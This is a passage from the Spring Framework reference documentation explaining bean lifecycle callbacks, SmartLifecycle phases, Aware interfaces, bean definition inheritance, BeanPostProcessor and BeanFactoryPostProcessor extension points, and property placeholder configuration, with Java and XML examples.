<<beans-postconstruct-and-predestroy-annotations, `@PostConstruct` and `@PreDestroy`
annotations>>. You can combine these mechanisms to control a given bean.

[NOTE]
====
If multiple lifecycle mechanisms are configured for a bean, and each mechanism is
configured with a different method name, then each configured method is executed in the
order listed below.
However, if the same method name is configured - for example,\n`init()` for an initialization method - for more than one of these lifecycle mechanisms,\nthat method is executed once, as explained in the preceding section.\n====\n\nMultiple lifecycle mechanisms configured for the same bean, with different\ninitialization methods, are called as follows:\n\n* Methods annotated with `@PostConstruct`\n* `afterPropertiesSet()` as defined by the `InitializingBean` callback interface\n* A custom configured `init()` method\n\nDestroy methods are called in the same order:\n\n* Methods annotated with `@PreDestroy`\n* `destroy()` as defined by the `DisposableBean` callback interface\n* A custom configured `destroy()` method\n\n\n[[beans-factory-lifecycle-processor]]\n==== Startup and shutdown callbacks\n\nThe `Lifecycle` interface defines the essential methods for any object that has its own\nlifecycle requirements (e.g. starts and stops some background process):\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic interface Lifecycle {\n\n\t\tvoid start();\n\n\t\tvoid stop();\n\n\t\tboolean isRunning();\n\n\t}\n----\n\nAny Spring-managed object may implement that interface. Then, when the\n`ApplicationContext` itself receives start and stop signals, e.g. for a stop\/restart\nscenario at runtime, it will cascade those calls to all `Lifecycle` implementations\ndefined within that context. It does this by delegating to a `LifecycleProcessor`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic interface LifecycleProcessor extends Lifecycle {\n\n\t\tvoid onRefresh();\n\n\t\tvoid onClose();\n\n\t}\n----\n\nNotice that the `LifecycleProcessor` is itself an extension of the `Lifecycle`\ninterface. It also adds two other methods for reacting to the context being refreshed\nand closed.\n\n[TIP]\n====\nNote that the regular `org.springframework.context.Lifecycle` interface is just a plain\ncontract for explicit start\/stop notifications and does NOT imply auto-startup at context\nrefresh time. Consider implementing `org.springframework.context.SmartLifecycle` instead\nfor fine-grained control over auto-startup of a specific bean (including startup phases).\nAlso, please note that stop notifications are not guaranteed to come before destruction:\nOn regular shutdown, all `Lifecycle` beans will first receive a stop notification before\nthe general destruction callbacks are being propagated; however, on hot refresh during a\ncontext's lifetime or on aborted refresh attempts, only destroy methods will be called.\n====\n\nThe order of startup and shutdown invocations can be important. If a \"depends-on\"\nrelationship exists between any two objects, the dependent side will start __after__ its\ndependency, and it will stop __before__ its dependency. However, at times the direct\ndependencies are unknown. You may only know that objects of a certain type should start\nprior to objects of another type. 
In those cases, the `SmartLifecycle` interface defines
another option, namely the `getPhase()` method as defined on its super-interface,
`Phased`.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public interface Phased {

		int getPhase();

	}
----

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public interface SmartLifecycle extends Lifecycle, Phased {

		boolean isAutoStartup();

		void stop(Runnable callback);

	}
----

When starting, the objects with the lowest phase start first, and when stopping, the
reverse order is followed. Therefore, an object that implements `SmartLifecycle` and
whose `getPhase()` method returns `Integer.MIN_VALUE` would be among the first to start
and the last to stop. At the other end of the spectrum, a phase value of
`Integer.MAX_VALUE` would indicate that the object should be started last and stopped
first (likely because it depends on other processes to be running). When considering the
phase value, it's also important to know that the default phase for any "normal"
`Lifecycle` object that does not implement `SmartLifecycle` would be 0. Therefore, any
negative phase value would indicate that an object should start before those standard
components (and stop after them), and vice versa for any positive phase value.

As you can see, the stop method defined by `SmartLifecycle` accepts a callback. Any
implementation __must__ invoke that callback's `run()` method after that implementation's
shutdown process is complete. That enables asynchronous shutdown where necessary since
the default implementation of the `LifecycleProcessor` interface,
`DefaultLifecycleProcessor`, will wait up to its timeout value for the group of objects
within each phase to invoke that callback. The default per-phase timeout is 30 seconds.
You can override the default lifecycle processor instance by defining a bean named
"lifecycleProcessor" within the context. If you only want to modify the timeout, then
defining the following would be sufficient:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="lifecycleProcessor" class="org.springframework.context.support.DefaultLifecycleProcessor">
		<!-- timeout value in milliseconds -->
		<property name="timeoutPerShutdownPhase" value="10000"/>
	</bean>
----

As mentioned, the `LifecycleProcessor` interface defines callback methods for the
refreshing and closing of the context as well. The latter will simply drive the shutdown
process as if `stop()` had been called explicitly, but it will happen when the context is
closing. The 'refresh' callback, on the other hand, enables another feature of
`SmartLifecycle` beans. When the context is refreshed (after all objects have been
instantiated and initialized), that callback will be invoked, and at that point the
default lifecycle processor will check the boolean value returned by each
`SmartLifecycle` object's `isAutoStartup()` method. If "true", then that object will be
started at that point rather than waiting for an explicit invocation of the context's or
its own `start()` method (unlike the context refresh, the context start does not happen
automatically for a standard context implementation).
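
For illustration only, the following is a minimal sketch of a `SmartLifecycle`
implementation; the `BackgroundPoller` class, its polling behavior, and the chosen
phase value are hypothetical, not part of Spring:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	import org.springframework.context.SmartLifecycle;

	public class BackgroundPoller implements SmartLifecycle {

		private volatile boolean running = false;

		public boolean isAutoStartup() {
			// start automatically when the context is refreshed
			return true;
		}

		public void start() {
			// start the background polling thread here
			this.running = true;
		}

		public void stop(Runnable callback) {
			// perform the shutdown work, then signal completion to the container
			stop();
			callback.run();
		}

		public void stop() {
			// stop the background polling thread here
			this.running = false;
		}

		public boolean isRunning() {
			return this.running;
		}

		public int getPhase() {
			// a negative phase: start before (and stop after) phase-0 Lifecycle beans
			return -10;
		}

	}
----
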
The "phase" value as well as any
"depends-on" relationships will determine the startup order in the same way as described
above.


[[beans-factory-shutdown]]
==== Shutting down the Spring IoC container gracefully in non-web applications

[NOTE]
====
This section applies only to non-web applications. Spring's web-based
`ApplicationContext` implementations already have code in place to shut down the Spring
IoC container gracefully when the relevant web application is shut down.
====

If you are using Spring's IoC container in a non-web application environment (for
example, in a rich client desktop environment), register a shutdown hook with the
JVM. Doing so ensures a graceful shutdown and calls the relevant destroy methods on your
singleton beans so that all resources are released. Of course, you must still configure
and implement these destroy callbacks correctly.

To register a shutdown hook, you call the `registerShutdownHook()` method that is
declared on the `ConfigurableApplicationContext` interface:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	import org.springframework.context.ConfigurableApplicationContext;
	import org.springframework.context.support.ClassPathXmlApplicationContext;

	public final class Boot {

		public static void main(final String[] args) throws Exception {

			ConfigurableApplicationContext ctx = new ClassPathXmlApplicationContext(
					new String[] {"beans.xml"});

			// add a shutdown hook for the above context...
			ctx.registerShutdownHook();

			// app runs here...

			// main method exits, hook is called prior to the app shutting down...

		}
	}
----



[[beans-factory-aware]]
=== ApplicationContextAware and BeanNameAware

When an `ApplicationContext` creates an object instance that implements the
`org.springframework.context.ApplicationContextAware` interface, the instance is provided
with a reference to that `ApplicationContext`.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public interface ApplicationContextAware {

		void setApplicationContext(ApplicationContext applicationContext) throws BeansException;

	}
----

Thus beans can programmatically manipulate the `ApplicationContext` that created them,
through the `ApplicationContext` interface, or by casting the reference to a known
subclass of this interface, such as `ConfigurableApplicationContext`, which exposes
additional functionality. One use would be the programmatic retrieval of other beans.
Sometimes this capability is useful; however, in general you should avoid it, because it
couples the code to Spring and does not follow the Inversion of Control style, where
collaborators are provided to beans as properties. Other methods of the
`ApplicationContext` provide access to file resources, allow you to publish application
events, and give access to a `MessageSource`. These additional features are described in
<<context-introduction>>.

As of Spring 2.5, autowiring is another alternative for obtaining a reference to the
`ApplicationContext`. The "traditional" `constructor` and `byType` autowiring modes (as
described in <<beans-factory-autowire>>) can provide a dependency of type
`ApplicationContext` for a constructor argument or setter method parameter,
respectively. For more flexibility, including the ability to autowire fields and
multiple parameter methods, use the new annotation-based autowiring features.
If you do,\nthe `ApplicationContext` is autowired into a field, constructor argument, or method\nparameter that is expecting the `ApplicationContext` type if the field, constructor, or\nmethod in question carries the `@Autowired` annotation. For more information, see\n<<beans-autowired-annotation>>.\n\nWhen an `ApplicationContext` creates a class that implements the\n`org.springframework.beans.factory.BeanNameAware` interface, the class is provided with\na reference to the name defined in its associated object definition.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic interface BeanNameAware {\n\n\t\tvoid setBeanName(String name) throws BeansException;\n\n\t}\n----\n\nThe callback is invoked after population of normal bean properties but before an\ninitialization callback such as `InitializingBean` __afterPropertiesSet__ or a custom\ninit-method.\n\n\n\n[[aware-list]]\n=== Other Aware interfaces\n\nBesides `ApplicationContextAware` and `BeanNameAware` discussed above, Spring offers a\nrange of `Aware` interfaces that allow beans to indicate to the container that they\nrequire a certain __infrastructure__ dependency. The most important `Aware` interfaces\nare summarized below - as a general rule, the name is a good indication of the\ndependency type:\n\n[[beans-factory-nature-aware-list]]\n.Aware interfaces\n|===\n| Name| Injected Dependency| Explained in...\n\n| `ApplicationContextAware`\n| Declaring `ApplicationContext`\n| <<beans-factory-aware>>\n\n| `ApplicationEventPublisherAware`\n| Event publisher of the enclosing `ApplicationContext`\n| <<context-introduction>>\n\n| `BeanClassLoaderAware`\n| Class loader used to load the bean classes.\n| <<beans-factory-class>>\n\n| `BeanFactoryAware`\n| Declaring `BeanFactory`\n| <<beans-factory-aware>>\n\n| `BeanNameAware`\n| Name of the declaring bean\n| <<beans-factory-aware>>\n\n| `BootstrapContextAware`\n| Resource adapter `BootstrapContext` the container runs in. Typically available only in\n JCA aware ``ApplicationContext``s\n| <<cci>>\n\n| `LoadTimeWeaverAware`\n| Defined __weaver__ for processing class definition at load time\n| <<aop-aj-ltw>>\n\n| `MessageSourceAware`\n| Configured strategy for resolving messages (with support for parametrization and\n internationalization)\n| <<context-introduction>>\n\n| `NotificationPublisherAware`\n| Spring JMX notification publisher\n| <<jmx-notifications>>\n\n| `ResourceLoaderAware`\n| Configured loader for low-level access to resources\n| <<resources>>\n\n| `ServletConfigAware`\n| Current `ServletConfig` the container runs in. Valid only in a web-aware Spring\n `ApplicationContext`\n| <<mvc>>\n\n| `ServletContextAware`\n| Current `ServletContext` the container runs in. Valid only in a web-aware Spring\n `ApplicationContext`\n| <<mvc>>\n|===\n\nNote again that usage of these interfaces ties your code to the Spring API and does not\nfollow the Inversion of Control style. As such, they are recommended for infrastructure\nbeans that require programmatic access to the container.\n\n\n\n\n[[beans-child-bean-definitions]]\n== Bean definition inheritance\nA bean definition can contain a lot of configuration information, including constructor\narguments, property values, and container-specific information such as initialization\nmethod, static factory method name, and so on. A child bean definition inherits\nconfiguration data from a parent definition. The child definition can override some\nvalues, or add others, as needed. 
Using parent and child bean definitions can save a lot\nof typing. Effectively, this is a form of templating.\n\nIf you work with an `ApplicationContext` interface programmatically, child bean\ndefinitions are represented by the `ChildBeanDefinition` class. Most users do not work\nwith them on this level, instead configuring bean definitions declaratively in something\nlike the `ClassPathXmlApplicationContext`. When you use XML-based configuration\nmetadata, you indicate a child bean definition by using the `parent` attribute,\nspecifying the parent bean as the value of this attribute.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"inheritedTestBean\" abstract=\"true\"\n\t\t\tclass=\"org.springframework.beans.TestBean\">\n\t\t<property name=\"name\" value=\"parent\"\/>\n\t\t<property name=\"age\" value=\"1\"\/>\n\t<\/bean>\n\n\t<bean id=\"inheritsWithDifferentClass\"\n\t\t\tclass=\"org.springframework.beans.DerivedTestBean\"\n\t\t\t**parent=\"inheritedTestBean\"** init-method=\"initialize\">\n\t\t<property name=\"name\" value=\"override\"\/>\n\t\t<!-- the age property value of 1 will be inherited from parent -->\n\t<\/bean>\n----\n\nA child bean definition uses the bean class from the parent definition if none is\nspecified, but can also override it. In the latter case, the child bean class must be\ncompatible with the parent, that is, it must accept the parent's property values.\n\nA child bean definition inherits scope, constructor argument values, property values, and\nmethod overrides from the parent, with the option to add new values. Any scope, initialization\nmethod, destroy method, and\/or `static` factory method settings that you specify will\noverride the corresponding parent settings.\n\nThe remaining settings are __always__ taken from the child definition: __depends on__,\n__autowire mode__, __dependency check__, __singleton__, __lazy init__.\n\nThe preceding example explicitly marks the parent bean definition as abstract by using\nthe `abstract` attribute. If the parent definition does not specify a class, explicitly\nmarking the parent bean definition as `abstract` is required, as follows:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"inheritedTestBeanWithoutClass\" abstract=\"true\">\n\t\t<property name=\"name\" value=\"parent\"\/>\n\t\t<property name=\"age\" value=\"1\"\/>\n\t<\/bean>\n\n\t<bean id=\"inheritsWithClass\" class=\"org.springframework.beans.DerivedTestBean\"\n\t\t\tparent=\"inheritedTestBeanWithoutClass\" init-method=\"initialize\">\n\t\t<property name=\"name\" value=\"override\"\/>\n\t\t<!-- age will inherit the value of 1 from the parent bean definition-->\n\t<\/bean>\n----\n\nThe parent bean cannot be instantiated on its own because it is incomplete, and it is\nalso explicitly marked as `abstract`. When a definition is `abstract` like this, it is\nusable only as a pure template bean definition that serves as a parent definition for\nchild definitions. Trying to use such an `abstract` parent bean on its own, by referring\nto it as a ref property of another bean or doing an explicit `getBean()` call with the\nparent bean id, returns an error. Similarly, the container's internal\n`preInstantiateSingletons()` method ignores bean definitions that are defined as\nabstract.\n\n[NOTE]\n====\n`ApplicationContext` pre-instantiates all singletons by default. 
Therefore, it is
important (at least for singleton beans) that if you have a (parent) bean definition
which you intend to use only as a template, and this definition specifies a class, you
must make sure to set the __abstract__ attribute to __true__; otherwise, the application
context will actually (attempt to) pre-instantiate the `abstract` bean.
====




[[beans-factory-extension]]
== Container Extension Points
Typically, an application developer does not need to subclass `ApplicationContext`
implementation classes. Instead, the Spring IoC container can be extended by plugging in
implementations of special integration interfaces. The next few sections describe these
integration interfaces.



[[beans-factory-extension-bpp]]
=== Customizing beans using a BeanPostProcessor

The `BeanPostProcessor` interface defines __callback methods__ that you can implement to
provide your own (or override the container's default) instantiation logic,
dependency-resolution logic, and so forth. If you want to implement some custom logic
after the Spring container finishes instantiating, configuring, and initializing a bean,
you can plug in one or more `BeanPostProcessor` implementations.

You can configure multiple `BeanPostProcessor` instances, and you can control the order
in which these ``BeanPostProcessor``s execute by setting the `order` property. You can
set this property only if the `BeanPostProcessor` implements the `Ordered` interface; if
you write your own `BeanPostProcessor`, you should consider implementing the `Ordered`
interface too. For further details, consult the javadocs of the `BeanPostProcessor` and
`Ordered` interfaces. See also the note below on
<<beans-factory-programmatically-registering-beanpostprocessors, programmatic
registration of ``BeanPostProcessor``s>>.

[NOTE]
====
``BeanPostProcessor``s operate on bean (or object) __instances__; that is to say, the
Spring IoC container instantiates a bean instance and __then__ ``BeanPostProcessor``s do
their work.

``BeanPostProcessor``s are scoped __per-container__. This is only relevant if you are
using container hierarchies. If you define a `BeanPostProcessor` in one container, it
will __only__ post-process the beans in that container. In other words, beans that are
defined in one container are not post-processed by a `BeanPostProcessor` defined in
another container, even if both containers are part of the same hierarchy.

To change the actual bean definition (i.e., the __blueprint__ that defines the bean),
you instead need to use a `BeanFactoryPostProcessor` as described in
<<beans-factory-extension-factory-postprocessors>>.
====

The `org.springframework.beans.factory.config.BeanPostProcessor` interface consists of
exactly two callback methods. When such a class is registered as a post-processor with
the container, for each bean instance that is created by the container, the
post-processor gets a callback from the container both __before__ container
initialization methods (such as InitializingBean's __afterPropertiesSet()__ and any
declared init method) are called and __after__ any bean initialization callbacks.
The post-processor can take any action with the bean instance, including ignoring the
callback completely. A bean post-processor typically checks for callback interfaces or
may wrap a bean with a proxy.
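
For example, the following is a sketch of a post-processor that wraps certain beans in a
JDK dynamic proxy; the `Auditable` marker interface and the logging behavior are
assumptions made purely for illustration:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	import java.lang.reflect.InvocationHandler;
	import java.lang.reflect.Method;
	import java.lang.reflect.Proxy;

	import org.springframework.beans.BeansException;
	import org.springframework.beans.factory.config.BeanPostProcessor;

	// hypothetical marker interface, used only for this illustration
	interface Auditable {
	}

	public class AuditProxyBeanPostProcessor implements BeanPostProcessor {

		public Object postProcessBeforeInitialization(Object bean, String beanName)
				throws BeansException {
			return bean;
		}

		public Object postProcessAfterInitialization(final Object bean, final String beanName)
				throws BeansException {
			// only wrap beans that implement the (hypothetical) Auditable marker interface
			if (!(bean instanceof Auditable)) {
				return bean;
			}
			// return a proxy that logs each invocation and delegates to the real bean
			return Proxy.newProxyInstance(
					bean.getClass().getClassLoader(),
					bean.getClass().getInterfaces(),
					new InvocationHandler() {
						public Object invoke(Object proxy, Method method, Object[] args)
								throws Throwable {
							System.out.println("calling " + method.getName()
									+ " on bean '" + beanName + "'");
							return method.invoke(bean, args);
						}
					});
		}

	}
----
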
Some Spring AOP infrastructure classes are implemented as\nbean post-processors in order to provide proxy-wrapping logic.\n\nAn `ApplicationContext` __automatically detects__ any beans that are defined in the\nconfiguration metadata which implement the `BeanPostProcessor` interface. The\n`ApplicationContext` registers these beans as post-processors so that they can be called\nlater upon bean creation. Bean post-processors can be deployed in the container just\nlike any other beans.\n\nNote that when declaring a `BeanPostProcessor` using an `@Bean` factory method on a\nconfiguration class, the return type of the factory method should be the implementation\nclass itself or at least the `org.springframework.beans.factory.config.BeanPostProcessor`\ninterface, clearly indicating the post-processor nature of that bean. Otherwise, the\n`ApplicationContext` won't be able to autodetect it by type before fully creating it.\nSince a `BeanPostProcessor` needs to be instantiated early in order to apply to the\ninitialization of other beans in the context, this early type detection is critical.\n\n\n[[beans-factory-programmatically-registering-beanpostprocessors]]\n.Programmatically registering BeanPostProcessors\n[NOTE]\n====\nWhile the recommended approach for `BeanPostProcessor` registration is through\n`ApplicationContext` auto-detection (as described above), it is also possible to\nregister them __programmatically__ against a `ConfigurableBeanFactory` using the\n`addBeanPostProcessor` method. This can be useful when needing to evaluate conditional\nlogic before registration, or even for copying bean post processors across contexts in a\nhierarchy. Note however that ``BeanPostProcessor``s added programmatically __do not\nrespect the `Ordered` interface__. Here it is the __order of registration__ that\ndictates the order of execution. Note also that ``BeanPostProcessor``s registered\nprogrammatically are always processed before those registered through auto-detection,\nregardless of any explicit ordering.\n====\n\n.BeanPostProcessors and AOP auto-proxying\n[NOTE]\n====\nClasses that implement the `BeanPostProcessor` interface are __special__ and are treated\ndifferently by the container. All ``BeanPostProcessor``s __and beans that they reference\ndirectly__ are instantiated on startup, as part of the special startup phase of the\n`ApplicationContext`. Next, all ``BeanPostProcessor``s are registered in a sorted fashion\nand applied to all further beans in the container. Because AOP auto-proxying is\nimplemented as a `BeanPostProcessor` itself, neither ``BeanPostProcessor``s nor the beans\nthey reference directly are eligible for auto-proxying, and thus do not have aspects\nwoven into them.\n\nFor any such bean, you should see an informational log message: \"__Bean foo is not\neligible for getting processed by all BeanPostProcessor interfaces (for example: not\neligible for auto-proxying)__\".\n\nNote that if you have beans wired into your `BeanPostProcessor` using autowiring or\n`@Resource` (which may fall back to autowiring), Spring might access unexpected beans\nwhen searching for type-matching dependency candidates, and therefore make them\nineligible for auto-proxying or other kinds of bean post-processing. 
For example, if you\nhave a dependency annotated with `@Resource` where the field\/setter name does not\ndirectly correspond to the declared name of a bean and no name attribute is used, then\nSpring will access other beans for matching them by type.\n====\n\nThe following examples show how to write, register, and use ``BeanPostProcessor``s in an\n`ApplicationContext`.\n\n\n[[beans-factory-extension-bpp-examples-hw]]\n==== Example: Hello World, BeanPostProcessor-style\n\nThis first example illustrates basic usage. The example shows a custom\n`BeanPostProcessor` implementation that invokes the `toString()` method of each bean as\nit is created by the container and prints the resulting string to the system console.\n\nFind below the custom `BeanPostProcessor` implementation class definition:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage scripting;\n\n\timport org.springframework.beans.factory.config.BeanPostProcessor;\n\timport org.springframework.beans.BeansException;\n\n\tpublic class InstantiationTracingBeanPostProcessor implements BeanPostProcessor {\n\n\t\t\/\/ simply return the instantiated bean as-is\n\t\tpublic Object postProcessBeforeInitialization(Object bean,\n\t\t\t\tString beanName) throws BeansException {\n\t\t\treturn bean; \/\/ we could potentially return any object reference here...\n\t\t}\n\n\t\tpublic Object postProcessAfterInitialization(Object bean,\n\t\t\t\tString beanName) throws BeansException {\n\t\t\tSystem.out.println(\"Bean '\" + beanName + \"' created : \" + bean.toString());\n\t\t\treturn bean;\n\t\t}\n\n\t}\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:lang=\"http:\/\/www.springframework.org\/schema\/lang\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/lang\n\t\t\thttp:\/\/www.springframework.org\/schema\/lang\/spring-lang.xsd\">\n\n\t\t<lang:groovy id=\"messenger\"\n\t\t\t\tscript-source=\"classpath:org\/springframework\/scripting\/groovy\/Messenger.groovy\">\n\t\t\t<lang:property name=\"message\" value=\"Fiona Apple Is Just So Dreamy.\"\/>\n\t\t<\/lang:groovy>\n\n\t\t<!--\n\t\twhen the above bean (messenger) is instantiated, this custom\n\t\tBeanPostProcessor implementation will output the fact to the system console\n\t\t-->\n\t\t<bean class=\"scripting.InstantiationTracingBeanPostProcessor\"\/>\n\n\t<\/beans>\n----\n\nNotice how the `InstantiationTracingBeanPostProcessor` is simply defined. It does not\neven have a name, and because it is a bean it can be dependency-injected just like any\nother bean. (The preceding configuration also defines a bean that is backed by a Groovy\nscript. 
The Spring dynamic language support is detailed in the chapter entitled\n<<dynamic-language>>.)\n\nThe following simple Java application executes the preceding code and configuration:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport org.springframework.context.ApplicationContext;\n\timport org.springframework.context.support.ClassPathXmlApplicationContext;\n\timport org.springframework.scripting.Messenger;\n\n\tpublic final class Boot {\n\n\t\tpublic static void main(final String[] args) throws Exception {\n\t\t\tApplicationContext ctx = new ClassPathXmlApplicationContext(\"scripting\/beans.xml\");\n\t\t\tMessenger messenger = (Messenger) ctx.getBean(\"messenger\");\n\t\t\tSystem.out.println(messenger);\n\t\t}\n\n\t}\n----\n\nThe output of the preceding application resembles the following:\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\nBean 'messenger' created : org.springframework.scripting.groovy.GroovyMessenger@272961\norg.springframework.scripting.groovy.GroovyMessenger@272961\n----\n\n\n[[beans-factory-extension-bpp-examples-rabpp]]\n==== Example: The RequiredAnnotationBeanPostProcessor\n\nUsing callback interfaces or annotations in conjunction with a custom\n`BeanPostProcessor` implementation is a common means of extending the Spring IoC\ncontainer. An example is Spring's `RequiredAnnotationBeanPostProcessor` - a\n`BeanPostProcessor` implementation that ships with the Spring distribution which ensures\nthat JavaBean properties on beans that are marked with an (arbitrary) annotation are\nactually (configured to be) dependency-injected with a value.\n\n\n\n[[beans-factory-extension-factory-postprocessors]]\n=== Customizing configuration metadata with a BeanFactoryPostProcessor\n\nThe next extension point that we will look at is the\n`org.springframework.beans.factory.config.BeanFactoryPostProcessor`. The semantics of\nthis interface are similar to those of the `BeanPostProcessor`, with one major\ndifference: `BeanFactoryPostProcessor` operates on the __bean configuration metadata__;\nthat is, the Spring IoC container allows a `BeanFactoryPostProcessor` to read the\nconfiguration metadata and potentially change it __before__ the container instantiates\nany beans other than ``BeanFactoryPostProcessor``s.\n\nYou can configure multiple ``BeanFactoryPostProcessor``s, and you can control the order in\nwhich these ``BeanFactoryPostProcessor``s execute by setting the `order` property.\nHowever, you can only set this property if the `BeanFactoryPostProcessor` implements the\n`Ordered` interface. If you write your own `BeanFactoryPostProcessor`, you should\nconsider implementing the `Ordered` interface too. Consult the javadocs of the\n`BeanFactoryPostProcessor` and `Ordered` interfaces for more details.\n\n[NOTE]\n====\nIf you want to change the actual bean __instances__ (i.e., the objects that are created\nfrom the configuration metadata), then you instead need to use a `BeanPostProcessor`\n(described above in <<beans-factory-extension-bpp>>). While it is technically possible\nto work with bean instances within a `BeanFactoryPostProcessor` (e.g., using\n`BeanFactory.getBean()`), doing so causes premature bean instantiation, violating the\nstandard container lifecycle. This may cause negative side effects such as bypassing\nbean post processing.\n\nAlso, ``BeanFactoryPostProcessor``s are scoped __per-container__. This is only relevant if\nyou are using container hierarchies. 
If you define a `BeanFactoryPostProcessor` in one
container, it will __only__ be applied to the bean definitions in that container. Bean
definitions in one container will not be post-processed by ``BeanFactoryPostProcessor``s
in another container, even if both containers are part of the same hierarchy.
====

A bean factory post-processor is executed automatically when it is declared inside an
`ApplicationContext`, in order to apply changes to the configuration metadata that
define the container. Spring includes a number of predefined bean factory
post-processors, such as `PropertyOverrideConfigurer` and
`PropertyPlaceholderConfigurer`. A custom `BeanFactoryPostProcessor` can also be used,
for example, to register custom property editors.

An `ApplicationContext` automatically detects any beans that are deployed into it that
implement the `BeanFactoryPostProcessor` interface. It uses these beans as bean factory
post-processors, at the appropriate time. You can deploy these post-processor beans as
you would any other bean.

[NOTE]
====
As with ``BeanPostProcessor``s, you typically do not want to configure
``BeanFactoryPostProcessor``s for lazy initialization. If no other bean references a
`Bean(Factory)PostProcessor`, that post-processor will not get instantiated at all.
Thus, marking it for lazy initialization will be ignored, and the
`Bean(Factory)PostProcessor` will be instantiated eagerly even if you set the
`default-lazy-init` attribute to `true` on the declaration of your `<beans />` element.
====


[[beans-factory-placeholderconfigurer]]
==== Example: the Class name substitution PropertyPlaceholderConfigurer

You use the `PropertyPlaceholderConfigurer` to externalize property values from a bean
definition in a separate file using the standard Java `Properties` format. Doing so
enables the person deploying an application to customize environment-specific properties
such as database URLs and passwords, without the complexity or risk of modifying the
main XML definition file or files for the container.

Consider the following XML-based configuration metadata fragment, where a `DataSource`
with placeholder values is defined. The example shows properties configured from an
external `Properties` file. At runtime, a `PropertyPlaceholderConfigurer` is applied to
the metadata and replaces some properties of the DataSource.
The values to replace\nare specified as __placeholders__ of the form `${property-name}` which follows the Ant \/\nlog4j \/ JSP EL style.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean class=\"org.springframework.beans.factory.config.PropertyPlaceholderConfigurer\">\n\t\t<property name=\"locations\" value=\"classpath:com\/foo\/jdbc.properties\"\/>\n\t<\/bean>\n\n\t<bean id=\"dataSource\" destroy-method=\"close\"\n\t\t\tclass=\"org.apache.commons.dbcp.BasicDataSource\">\n\t\t<property name=\"driverClassName\" value=\"${jdbc.driverClassName}\"\/>\n\t\t<property name=\"url\" value=\"${jdbc.url}\"\/>\n\t\t<property name=\"username\" value=\"${jdbc.username}\"\/>\n\t\t<property name=\"password\" value=\"${jdbc.password}\"\/>\n\t<\/bean>\n----\n\nThe actual values come from another file in the standard Java `Properties` format:\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\njdbc.driverClassName=org.hsqldb.jdbcDriver\njdbc.url=jdbc:hsqldb:hsql:\/\/production:9002\njdbc.username=sa\njdbc.password=root\n----\n\nTherefore, the string `${jdbc.username}` is replaced at runtime with the value 'sa', and\nthe same applies for other placeholder values that match keys in the properties file.\nThe `PropertyPlaceholderConfigurer` checks for placeholders in most properties and\nattributes of a bean definition. Furthermore, the placeholder prefix and suffix can be\ncustomized.\n\nWith the `context` namespace introduced in Spring 2.5, it is possible to configure\nproperty placeholders with a dedicated configuration element. One or more locations can\nbe provided as a comma-separated list in the `location` attribute.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<context:property-placeholder location=\"classpath:com\/foo\/jdbc.properties\"\/>\n----\n\nThe `PropertyPlaceholderConfigurer` not only looks for properties in the `Properties`\nfile you specify. By default it also checks against the Java `System` properties if it\ncannot find a property in the specified properties files. You can customize this\nbehavior by setting the `systemPropertiesMode` property of the configurer with one of\nthe following three supported integer values:\n\n* __never__ (0): Never check system properties\n* __fallback__ (1): Check system properties if not resolvable in the specified\n properties files. This is the default.\n* __override__ (2): Check system properties first, before trying the specified\n properties files. This allows system properties to override any other property source.\n\nConsult the `PropertyPlaceholderConfigurer` javadocs for more information.\n\n[TIP]\n====\nYou can use the `PropertyPlaceholderConfigurer` to substitute class names, which is\nsometimes useful when you have to pick a particular implementation class at runtime. 
For\nexample:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean class=\"org.springframework.beans.factory.config.PropertyPlaceholderConfigurer\">\n\t\t<property name=\"locations\">\n\t\t\t<value>classpath:com\/foo\/strategy.properties<\/value>\n\t\t<\/property>\n\t\t<property name=\"properties\">\n\t\t\t<value>custom.strategy.class=com.foo.DefaultStrategy<\/value>\n\t\t<\/property>\n\t<\/bean>\n\n\t<bean id=\"serviceStrategy\" class=\"${custom.strategy.class}\"\/>\n----\n\nIf the class cannot be resolved at runtime to a valid class, resolution of the bean\nfails when it is about to be created, which is during the `preInstantiateSingletons()`\nphase of an `ApplicationContext` for a non-lazy-init bean.\n====\n\n\n[[beans-factory-overrideconfigurer]]\n==== Example: the PropertyOverrideConfigurer\n\nThe `PropertyOverrideConfigurer`, another bean factory post-processor, resembles the\n`PropertyPlaceholderConfigurer`, but unlike the latter, the original definitions can\nhave default values or no values at all for bean properties. If an overriding\n`Properties` file does not have an entry for a certain bean property, the default\ncontext definition is used.\n\nNote that the bean definition is __not__ aware of being overridden, so it is not\nimmediately obvious from the XML definition file that the override configurer is being\nused. In case of multiple `PropertyOverrideConfigurer` instances that define different\nvalues for the same bean property, the last one wins, due to the overriding mechanism.\n\nProperties file configuration lines take this format:\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\nbeanName.property=value\n----\n\nFor 